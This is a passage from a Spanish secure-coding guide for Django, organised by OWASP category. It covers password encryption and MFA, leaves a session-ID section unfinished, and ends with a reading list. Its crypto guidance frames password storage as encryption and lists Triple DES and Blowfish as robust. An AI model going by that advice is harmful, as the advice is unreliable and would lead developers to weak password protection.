1. Utilizar siempre cifrado para las contraseñas de acceso de los usuarios, preferiblemente la opción que ofrece el propio framework, siempre que no utilice un cifrado débil.
2. En caso de tener que implementar una funcionalidad de cifrado a las contraseñas propio utilizar siempre librerías conocidas y testeadas.

A demás de las mitigaciones hay que tener algunas pautas sobre el cifrado de datos:

1. Utilizar algoritmos de cifrado robustos:
  + AES
  + RSA
  + Triple DES
  + Blowfish
2. Nunca hacer un cifrado propio, existen pocas personas que puedan hacer un algoritmo de cifrado robusto y hacen falta años de depuración de varios expertos para conseguir un cifrado sin fallos.

### 2.6. Falta o mala implementación de MFA

En según que casos podemos encontrarnos que una implementación de un factor de autenticación múltiple, cómo puede ser un OTP o certificado además del usuario y contraseña, es necesaria para proteger correctamente acciones o accesos a secciones restringidas y/o privadas del usuario.

En el caso de una aplicación bancaria en la que hay que realizar ciertas acciones, como la transferencia de dinero a cuentas ajenas, suele ser habitual y buena práctica implementar un método de autenticación antes de realizarla, siendo un OTP o una tarjeta de coordenadas, siendo esta última ya la menos recomendada.

Otro caso podría ser el cambio de contraseña, necesitándose un OTP y la antigua contraseña para cambiarla por otra.

#### 2.6.1. Código vulnerable

No existe un código vulnerable como tal ya que estás vulnerabilidades radican en la lógica de la aplicación, aplicando MFA en el login y en las acciones con riesgo para el usuario.

#### 2.6.2. Funciones peligrosas

Realizar una estructura propia de MFA con un OTP no suele ser buena idea por su complejidad. En la mayoría de casos es posible utilizar librerías y herramientas que pueden facilitar el uso y evitar errores comunes y ya conocidos por sus desarrolladores.

#### 2.6.3. Mitigaciones recomendadas

Las mitigaciones se ordena de forma que la primera debe ser la prioritaria para mitigar la vulnerabilidad.

1. Utilizar las librerías de los frameworks.
+ Django: [https://pypi.org/project/django-mfa/](https://pypi.org/project/django-mfa/)
2. En caso de tener que desarrollar una solución MFA tener en cuenta los RFC que existen y tener en cuenta la seguridad en su desarrollo ya que se trata de un componente crítico en caso de que falle.
+ OTP: [https://datatracker.ietf.org/doc/html/rfc6238](https://datatracker.ietf.org/doc/html/rfc6238)

### 2.7. Exposición de ID de sesión en la URL

El ID de usuario de sesión se utiliza para autenticarlo en cada petición que se realiza en la conexión a la aplicación, para que el usuario no tenga que introducir las credenciales en cada petición. Sin embargo, un atacante si se hace con el ID de sesión podría iniciar sesión como ese usuario y realizar acciones críticas.

#### 2.7.1. Código vulnerable
```

```

#### 2.7.2. Funciones peligrosas
#### 2.7.3. Mitigaciones **NO** recomendadas
#### 2.7.4. Mitigaciones recomendadas

## Esquema de ejemplo

## AX - <Owasp top ten>
### 1.1. <Vulnerabilidad>
#### 1.1.1. Código vulnerable
#### 1.1.2. Funciones peligrosas
#### 1.1.3. Mitigaciones **NO** recomendadas
#### 1.1.4. Mitigaciones recomendadas

## Webgrafía

### Vulnerable django apps
- [https://github.com/adeyosemanputra/pygoat](https://github.com/adeyosemanputra/pygoat)
- [https://github.com/andresriancho/django-moth](https://github.com/andresriancho/django-moth)

### A1 - Injections

#### SQL Injection
- [https://realpython.com/prevent-python-sql-injection/](https://realpython.com/prevent-python-sql-injection/)
- [https://r2c.dev/blog/2020/preventing-sql-injection-a-django-authors-perspective/](https://r2c.dev/blog/2020/preventing-sql-injection-a-django-authors-perspective/)
#### SST Injecton
- [https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/](https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/)
- [https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/](https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/)
#### Xpath Injection
- [https://rules.sonarsource.com/python/RSPEC-2091](https://rules.sonarsource.com/python/RSPEC-2091)
#### Header injection
- [https://rules.sonarsource.com/python/RSPEC-5167](https://rules.sonarsource.com/python/RSPEC-5167)
#### Code injection
- [https://research.cs.wisc.edu/mist/SoftwareSecurityCourse/Chapters/3_8_3-Code-Injections.pdf](https://research.cs.wisc.edu/mist/SoftwareSecurityCourse/Chapters/3_8_3-Code-Injections.pdf)
#### Code injection
- [https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1](https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1)

### A2 - Broken authentication

- [https://github.com/jazzband/django-defender](https://github.com/jazzband/django-defender)

### A7 - XSS

- [https://www.stackhawk.com/blog/django-xss-examples-prevention/](https://www.stackhawk.com/blog/django-xss-examples-prevention/)
- [https://docs.djangoproject.com/en/3.2/topics/security/](https://docs.djangoproject.com/en/3.2/topics/security/)
- [https://tonybaloney.github.io/posts/xss-exploitation-in-django.html](https://tonybaloney.github.io/posts/xss-exploitation-in-django.html)

### Ax - Deserialización
- [https://frichetten.com/blog/escalating-deserialization-attacks-python/](https://frichetten.com/blog/escalating-deserialization-attacks-python/)
